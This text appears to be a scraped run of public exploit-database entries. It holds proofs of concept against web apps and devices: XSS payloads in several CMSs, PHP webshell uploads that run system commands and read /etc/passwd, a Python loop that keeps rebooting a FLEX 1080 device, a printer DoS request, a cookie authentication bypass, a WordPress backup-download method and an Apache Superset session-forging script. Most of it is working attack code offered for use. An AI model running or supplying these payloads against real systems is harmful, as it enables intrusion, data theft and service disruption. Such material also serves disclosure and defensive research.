https://localhost/mongo/index.php?action=login.index&host=0 Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1; rock_format=json Upgrade-Insecure-Requests: 1 Host: localhost more=0&host=0&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=****&db=&lang=es_es&expire=3 POST http://localhost/mongo/index.php?action=server.command& HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 109 Origin: https://localhost Authorization: Basic cm9vdDpyb290 Connection: keep-alive Referer: https://localhost/mongo/index.php?action=server.command& Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1; rock_format=json Upgrade-Insecure-Requests: 1 Host: localhost command=%7B%0D%0A++listCommands%3A+1%0D%0A%7D&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&format=json POST http://localhost/mongo/index.php?action=server.execute& HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 140 Origin: https://localhost Authorization: Basic cm9vdDpyb290 Connection: keep-alive Referer: https://localhost/mongo/index.php?action=server.execute& Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1; rock_format=json Upgrade-Insecure-Requests: 1 Host: localhost code=function+%28%29+%7B%0D%0A+++var+plus+%3D+1+%2B+2%3B%0D%0A+++return+plus%3B%0D%0A%7D&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E

# Exploit Title: FLEX 1080 < 1085 Web 1.6.0 - Denial of Service # Date: 2023-05-06 # Exploit Author: Mr Empy # Vendor Homepage: https://www.tem.ind.br/ # Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94 # Version: 1.6.0 # Tested on: Android # CVE ID: CVE-2022-2591 #!/usr/bin/env python3 import requests import re import argparse from colorama import Fore import time def main(): def banner(): print(''' ________ _______ __ / ____/ / / ____/ |/ / / /_ / / / __/ | / / __/ / /___/ /___ / | /_/ /_____/_____//_/|_| [FLEX 1080 < 1085 Web 1.6.0 - Denial of Service] ''') def reboot(): r = requests.get(f'http://{arguments.target}/sistema/flash/reboot') if 'Rebooting' in r.text: pass else: print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware não é vulnerável') quit() banner() print(f'{Fore.LIGHTBLUE_EX}[*] {Fore.LIGHTWHITE_EX} Iniciando o ataque') while True: try: reboot() print(f'{Fore.LIGHTGREEN_EX}[+] {Fore.LIGHTWHITE_EX} Hardware derrubado com sucesso!') time.sleep(1) except: # print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware está inativo') pass if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-t','--target', action='store', help='Target', dest='target', required=True) arguments = parser.parse_args() try: main() except KeyError: quit()

# Exploit Title: Epson Stylus SX510W Printer Remote Power Off - Denial of Service (PoC) # Discovery by: Rafael Pedrero # Discovery Date: 2020-05-16 # Vendor Homepage: https://www.epson.es/ # Software Link : https://www.epson.es/products/printers/inkjet-printers/for-home/epson-stylus-sx510w # Tested Version: EPSON_Linux UPnP/1.0 Epson UPnP SDK/1.0 # Tested on: Linux/Windows # Vulnerability Type: Denial of Service (DoS) 1. Description The vulnerability occurs when 2 or more &'s are sent to the server in a row ("/PRESENTATION/HTML/TOP/INDEX.HTML") causing it to shutdown. 2. Proof of Concept Request: curl -s "http:// <printer_ip_address>/PRESENTATION/HTML/TOP/INDEX.HTML?RELOAD=&&tm=1589865865549" 3. Solution: This version product is deprecated. -->

# Exploit Title: Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS) # Date: 27-06-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://bigprof.com # Software Download Link : https://bigprof.com/appgini/applications/online-clinic-management-system # Version : 2.2 # Category: Webapps # Tested on: Windows 7 64 Bits / Windows 10 64 Bits # CVE : # Category: webapps # Vulnerability Type: Stored Cross-Site Scripting 1. Description Online Clinic Management System 2.2, does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via the /clinic/medical_records_view.php, in FirstRecord parameter, GET and POST request. 2. Proof of Concept GET: http://127.0.0.1/clinic/medical_records_view.php?SelectedID=2&record-added-ok=5781&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString= POST: POST http://127.0.0.1/clinic/medical_records_view.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: multipart/form-data; boundary=---------------------------1512016725878 Content-Length: 1172 Origin: https://127.0.0.1 Connection: keep-alive Referer: https://127.0.0.1/clinic/medical_records_view.php Cookie: online_clinic_management_system=bnl1ht0a4n7snalaoqgh8f85b4; online_clinic_management_system.dvp_expand=[%22tab_medical_records-patient%22%2C%22tab_events-name_patient%22] Upgrade-Insecure-Requests: 1 Host: 127.0.0.1 -----------------------------1512016725878 Content-Disposition: form-data; name="current_view" DVP -----------------------------1512016725878 Content-Disposition: form-data; name="SortField" -----------------------------1512016725878 Content-Disposition: form-data; name="SelectedID" 1 -----------------------------1512016725878 Content-Disposition: form-data; name="SelectedField" -----------------------------1512016725878 Content-Disposition: form-data; name="SortDirection" -----------------------------1512016725878 Content-Disposition: form-data; name="FirstRecord" "><script>alert(1);</script> -----------------------------1512016725878 Content-Disposition: form-data; name="NoDV" -----------------------------1512016725878 Content-Disposition: form-data; name="PrintDV" -----------------------------1512016725878 Content-Disposition: form-data; name="DisplayRecords" all -----------------------------1512016725878 Content-Disposition: form-data; name="patient" -----------------------------1512016725878 Content-Disposition: form-data; name="SearchString" -----------------------------1512016725878-- 1. Description Online Clinic Management System 2.2, does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via the /clinic/patients_view.php, in FirstRecord parameter. 2. Proof of Concept http://127.0.0.1/clinic/patients_view.php?SelectedID=1&record-added-ok=11536&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString= And Reflected Cross-Site Scripting (XSS) too. # Vulnerability Type: Reflected Cross-Site Scripting 1. Description Online Clinic Management System 2.2, does not sufficiently encode user-controlled inputs, resulting in a Reflected Cross-Site Scripting (XSS) vulnerability via the /clinic/events_view.php, in FirstRecord parameter. 2. Proof of Concept http://127.0.0.1/clinic/events_view.php?SelectedID=2&record-added-ok=7758&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString= 1. Description Online Clinic Management System 2.2, does not sufficiently encode user-controlled inputs, resulting in a Reflected Cross-Site Scripting (XSS) vulnerability via the /clinic/disease_symptoms_view.php, in FirstRecord parameter. 2. Proof of Concept http://127.0.0.1/clinic/disease_symptoms_view.php?SelectedID=1&record-added-ok=1096&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=

<!-- # Exploit Title: Job Portal 1.0 - File Upload Restriction Bypass # Date: 27-06-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://phpgurukul.com/job-portal-project/ # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7855 # Version: 1.0 # Tested on: Windows 7 64 Bits / Windows 10 64 Bits # CVE : # Category: webapps 1. Description File Upload Restriction Bypass vulnerabilities were found in Job Portal 1.0. This allows for an authenticated user to potentially obtain RCE via webshell. 2. Proof of Concept 1. Go the user profile >> (/jobportal/applicant/) 2.- Select profile image and load a valid image. 3. Turn Burp/ZAP Intercept On 4. Select webshell - ex: shell.png 5. Alter request in the upload... Update 'filename' to desired extension. ex: shell.php Not neccesary change content type to 'image/png' Example exploitation request: ==================================================================================================== POST http://127.0.0.1/jobportal/applicant/controller.php?action=photos HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: multipart/form-data; boundary=---------------------------57052814523281 Content-Length: 555 Origin: https://127.0.0.1 Connection: keep-alive Referer: https://127.0.0.1/jobportal/applicant/index.php?view=view&id= Cookie: PHPSESSID=qf9e02j0rda99cj91l36qcat34 Upgrade-Insecure-Requests: 1 Host: 127.0.0.1 -----------------------------57052814523281 Content-Disposition: form-data; name="MAX_FILE_SIZE" 1000000 -----------------------------57052814523281 Content-Disposition: form-data; name="photo"; filename="shell.php" Content-Type: image/png ?PNG ... <?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?> IEND -----------------------------57052814523281 Content-Disposition: form-data; name="savephoto" -----------------------------57052814523281-- ==================================================================================================== 6. Send the request and visit your new webshell Ex: https://127.0.0.1/jobportal/applicant/photos/shell.php?cmd=whoami nt authority\system 3. Solution: Patch: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload -->

#Exploit Title: TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS) #Application: TinyWebGallery #Version: v2.5 #Bugs: Stored Xss #Technology: PHP #Vendor URL: http://www.tinywebgallery.com/ #Software Link: https://www.tinywebgallery.com/download.php?tinywebgallery=latest #Date of found: 07-05-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Login to account 2. Go to http://localhost/twg25/index.php?twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg 3. Edit 4. Set folder name section as <script>alert(4)</script> Request : POST /twg25/i_frames/i_titel.php HTTP/1.1 Host: localhost Content-Length: 264 Cache-Control: max-age=0 sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: iframe Referer: http://localhost/twg25/i_frames/i_titel.php?twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=qc7mfbthpf7tnf32a34p8l766k Connection: close twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg&twg_foffset=&twg_submit=true&twg_titel_page2=true&twg_foldername_mod=1&twg_foldername=%26lt%3Bscript%26gt%3Balert%284%29%26lt%3B%2Fscript%26gt%3B&twg_folderdesc_mod=1&twg_folderdesc=aaaaaaaaaaaaaaaaa&twg_submit=Save 5. Go to http://localhost/twg25/index.php

#Exploit Title: TinyWebGallery v2.5 - Remote Code Execution (RCE) #Application: TinyWebGallery #Version: v2.5 #Bugs: RCE #Technology: PHP #Vendor URL: http://www.tinywebgallery.com/ #Software Link: https://www.tinywebgallery.com/download.php?tinywebgallery=latest #Date of found: 07-05-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Go to upload image http://localhost/twg25/admin/index.php?action=upload&sview=no&menu=true 2. upload .phar file payload: payload: <?php echo system("cat /etc/passwd"); ?> 3. go to file link poc request: POST /twg25/admin/index.php?action=upload&dir=&order=name&srt=yes&tview=no&sview=no&lang=en HTTP/1.1 Host: localhost Content-Length: 2123 Cache-Control: max-age=0 sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundary53rZRhJinqaMm7Ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/twg25/admin/index.php?action=upload&sview=no&menu=true Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=qc7mfbthpf7tnf32a34p8l766k Connection: close ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="token" b2ed5512107a625ef9d5688ced296c61 ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="MAX_FILE_SIZE" 2097152 ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="confirm" true ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="userfile[]"; filename="shell.phar" Content-Type: application/octet-stream <?php echo system("cat /etc/passwd"); ?> ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="userfile[]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="userfile[]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="userfile[]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="userfile[]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="userfile[]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="userfile[]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="userfile[]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="userfile[]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="userfile[]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="twgsize" 100000 ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="twgquality" 80 ------WebKitFormBoundary53rZRhJinqaMm7Ip-- http://localhost/twg25/pictures/shell.phar

# Exploit Title: Optoma 1080PSTX Firmware C02 - Authentication Bypass # Date: 2023/05/09 # Exploit Author: Anthony Cole # Contact: http://twitter.com/acole76 # Website: http://twitter.com/acole76 # Vendor Homepage: http://optoma.com # Version: Optoma 1080PSTX Firmware C02 # Tested on: N/A # CVE : CVE-2023-27823 Details By default the web interface of the 1080PSTX requires a username and password to access the application control panel. However, an attacker, on the same network, can bypass it by manually setting the "atop" cookie to the value of "1". GET /index.asp HTTP/1.1 Host: projector Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: atop=1 Connection: close

# Exploit Title: WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup # Google Dork: intitle:("Index of /wp-content/plugins/backup-backup") AND inurl:("plugins/backup-backup/") # Date: 2023-05-10 # Exploit Author: Wadeek # Vendor Homepage: https://backupbliss.com/ # Software Link: https://downloads.wordpress.org/plugin/backup-backup.1.2.8.zip # Version: 1.2.8 # Tested on: WordPress 6.2 1) Get the version of the plugin. => GET /wp-content/plugins/backup-backup/readme.txt -------------------------------------------------------------------------- Stable tag: 1.2.8 -------------------------------------------------------------------------- 2) Get the name of the backup directory. => GET /wp-content/backup-migration/config.json -------------------------------------------------------------------------- { [...], "STORAGE::LOCAL::PATH":"[...]/wp-content/backup-migration-xXxXxxXxXx", [...], "OTHER:EMAIL":"[email protected]" } -------------------------------------------------------------------------- 3) Get the name of the archive containing the backups. => GET /wp-content/backup-migration/complete_logs.log -------------------------------------------------------------------------- BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip -------------------------------------------------------------------------- 4) Build the path for the download. => GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip

# Exploit Title: Authenticated Persistent XSS in Cameleon CMS 2.7.4 # Google Dork: intext:"Camaleon CMS is a free and open-source tool and a fexible content management system (CMS) based on Ruby on Rails" # Date: 2023-10-05 # Exploit Author: Yasin Gergin # Vendor Homepage: http://camaleon.tuzitio.com # Software Link: https://github.com/owen2345/camaleon-cms # Version: 2.7.4 # Tested on: Linux kali 6.1.0-kali7-amd64 # CVE : - --- Description --- http://127.0.0.1:3000/admin/login - Login as a Admin Under Post tab click on "Create New" While creating the post set Title as "><svg/onmouseover=alert(document.cookie)> http://127.0.0.1:3000/admin/post_type/2/posts - Post data will be sent to this url -- POST DATA -- POST /admin/post_type/2/posts HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://127.0.0.1:3000/admin/post_type/2/posts/new Content-Type: application/x-www-form-urlencoded Content-Length: 666 Origin: http://127.0.0.1:3000 Connection: keep-alive Cookie: _my_project_session=w4yj2Y%2FqHaXYDhwwBDnYsyQUc6AtLUnItJ3MGHBV1yS40xwTgjfvlBZVNgqKIvg1W58e0mxyW4OcBk0XwJRZ90j6SmCHG1KJG9ppBKk%2FdKGDboPCRBq40qKhHnkssRPCgRgIjs69EG7htSdUY%2Bbgit9XTESgvSusBBhsIED%2BLH0VBOBL6H%2FV4Mp59NEP7LhP%2FHmlulEa7I43J8HKpStDj2HiXxA5ZghvSkvpfQpN2d047jLhl71CUcW7pHxmJ4uAdY5ip5OTIhJG9TImps5TbIUrOHyE9vKp1LXzdmbNNi2GI5utUUsURLGUtaN7Fam3Kpi8IqEaBA%3D%3D--8ZKl2%2F6OzLCXn2qA--%2BtMhAwdbdfxNzoSPajkZrg%3D%3D; auth_token=iRDUqXfbhmibLIM5mrHelQ&Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A102.0%29+Gecko%2F20100101+Firefox%2F102.0&127.0.0.1; phpMyAdmin=4f5ad7484490645a49d171c03e15dab2; pma_lang=en Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 authenticity_token=vuAzhnu6UocDR6zpeeaQxvlVjdmIMr9LPrLEcK5FGVAEYQamLHI1fAG7jBQ3FwEX_ACWedzoX72WAUxqj5wKrQ&post%5Bdraft_id%5D=&post%5Bslug%5D=svgonmouseoveralertdocumentcookie&meta%5Bslug%5D=svgonmouseoveralertdocumentcookie&post%5Btitle%5D=%22%3E%3Csvg%2Fonmouseover%3Dalert%28document.cookie%29%3E&post%5Bcontent%5D=%3Cp%3Eqwe%3C%2Fp%3E&meta%5Bsummary%5D=qwe&options%5Bseo_title%5D=&options%5Bkeywords%5D=&options%5Bseo_description%5D=&options%5Bseo_author%5D=&options%5Bseo_image%5D=&options%5Bseo_canonical%5D=&commit=Create&post%5Bstatus%5D=published&meta%5Btemplate%5D=&meta%5Bhas_comments%5D=0&meta%5Bhas_comments%5D=1&categories%5B%5D=6&tags=&meta%5Bthumb%5D= -- POST DATA -- Then view the post you've created by clicking on "View Page" move your mouse cursor onto post title. XSS will popup.

# Exploit Title: Apache Superset 2.0.0 - Authentication Bypass # Date: 10 May 2023 # Exploit Author: MaanVader # Vendor Homepage: https://superset.apache.org/ # Version: Apache Superset<= 2.0.1 # Tested on: 2.0.0 # CVE: CVE-2023-27524 from flask_unsign import session import requests import urllib3 import argparse import re from time import sleep from selenium import webdriver from urllib.parse import urlparse urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) SECRET_KEYS = [ b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h', # version < 1.4.1 b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET', # version >= 1.4.1 b'thisISaSECRET_1234', # deployment template b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY', # documentation b'TEST_NON_DEV_SECRET' # docker compose ] def main(): parser = argparse.ArgumentParser() parser.add_argument('--url', '-u', help='Base URL of Superset instance', required=True) parser.add_argument('--id', help='User ID to forge session cookie for, default=1', required=False, default='1') args = parser.parse_args() try: u = args.url.rstrip('/') + '/login/' headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0' } resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False) if resp.status_code != 200: print(f'Error retrieving login page at {u}, status code: {resp.status_code}') return session_cookie = None for c in resp.cookies: if c.name == 'session': session_cookie = c.value break if not session_cookie: print('Error: No session cookie found') return print(f'Got session cookie: {session_cookie}') try: decoded = session.decode(session_cookie) print(f'Decoded session cookie: {decoded}') except: print('Error: Not a Flask session cookie') return match = re.search(r'"version_string": "(.*?)&#34', resp.text) if match: version = match.group(1) else: version = 'Unknown' print(f'Superset Version: {version}') for i, k in enumerate(SECRET_KEYS): cracked = session.verify(session_cookie, k) if cracked: break if not cracked: print('Failed to crack session cookie') return print(f'Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: {k}') try: user_id = int(args.id) except: user_id = args.id forged_cookie = session.sign({'_user_id': user_id, 'user_id': user_id}, k) print(f'Forged session cookie for user {user_id}: {forged_cookie}') u1 = args.url.rstrip('/') + '/superset/welcome' print(f"Now visit the url: `{u1}` and replace the current session cookie with this `{forged_cookie}` and refresh the page and we will be logged in as admin to the dashboard:)") except Exception as e: print(f'Unexpected error: {e}') if __name__ == '__main__': main()

# Exploit Title: PnPSCADA v2.x - Unauthenticated PostgreSQL Injection # Date: 15/5/2023 # Exploit Author: Momen Eldawakhly (Cyber Guy) at Samurai Digital Security Ltd # Vendor Homepage: https://pnpscada.com/ # Version: PnPSCADA (cross platforms): v2.x # Tested on: Unix # CVE : CVE-2023-1934 # Proof-of-Concept: https://drive.google.com/drive/u/0/folders/1r_HMoaU3P0t-04gMM90M0hfdBRi_P0_8 SQLi crashing point: GET /hitlogcsv.isp?userids=1337'&startdate= 2022-12-138200083A0093A00&enddate=2022-12-138201383A1783A00 HTTP/1.1 Cache-Control: no-cache User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14 Host: vulnerablepnpscada.int Accept: */* Accept-Encoding: gzip, deflate Connection: close

# Exploit Title: e107 v2.3.2 - Reflected XSS # Date: 11/05/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: [email protected] # Vendor Homepage: https://e107.org/ # Software Link: https://e107.org/download # Version: 2.3.2 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### XSS Reflected - unauthorized URL: http://127.0.0.1/e107/e107_plugins/tinymce4/plugins/e107/parser.php Parameters: content # POC Request: POST /e107/e107_plugins/tinymce4/plugins/e107/parser.php HTTP/1.1 Host: 127.0.0.1 Content-Length: 1126 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" Accept: text/html, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://127.0.0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3 Accept-Encoding: gzip, deflate Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close content=%5Bhtml%5D%3Cp%3E%3Cstrong%3ELore"/><script>alert(1)</script>bb&mode=tohtml Response: HTTP/1.1 200 OK Date: Thu, 11 May 2023 19:38:45 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Set-Cookie: PHPSESSID=c4mphnf1igb7lbibn4q1eni10h; expires=Fri, 12-May-2023 19:38:45 GMT; Max-Age=86400; path=/e107/; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 1053 Connection: close Content-Type: text/html; charset=UTF-8 <!-- bbcode-html-start --><p><strong>Lore"/><script>alert(1)</script>bb ### XSS Reflected - Authorized URL: http://127.0.0.1/e107/e107_admin/image.php Parameters: for # POC 1 Request: GET /e107/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1 HTTP/1.1 Host: 127.0.0.1 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Connection: close Response: HTTP/1.1 200 OK Date: Thu, 04 May 2023 03:07:35 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "37f107dbe6a998ecf7b71689627c2a56" Content-Length: 12420 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 <!doctype html> <html lang="en"> <head> <title>Media Manager - Admin Area :: hacked">bbbbb</title> <meta charset='utf-8' /> <meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" /> <!-- *CSS* --> [...] <div id="uploader" data-max-size="2mb" rel="/e107/e107_web/js/plupload/upload.php?for=_commonh5it1"><img src=a onerror=alert(1)>dezaw&path="> <p>No HTML5 support.</p> </div> [...] # POC 2 URL: http://127.0.0.1/e107/e107_admin/newspost.php Parameters: Payload in URL Request: GET /e107/e107_admin/newspost.php/sdd4h"><script>alert(1)</script>kzb89?mode=main&action=list HTTP/1.1 Host: 127.0.0.1 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3 Accept-Encoding: gzip, deflate Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=ftq2gnr1kgjqhfa3u902thraa8 Connection: close Response: HTTP/1.1 200 OK Date: Fri, 05 May 2023 06:21:53 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "d127dd6a44a22e093fed60b83bf36af2" Content-Length: 72914 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 <!doctype html> <html lang="en"> <head> <title>News - List - Admin Area :: hacked">bbbbb</title> <meta charset='utf-8' /> <meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" /> <!-- *CSS* --> [...] <a class="btn btn-default btn-secondary nextprev-item next " href="http://127.0.0.1/e107/e107_admin/newspost.php/sdd4h"> <script>alert(1)</script>kzb89/?mode=main&action=list&from=10" title="Go to the next page" ><i class="fa fa-forward"></i></a> [...]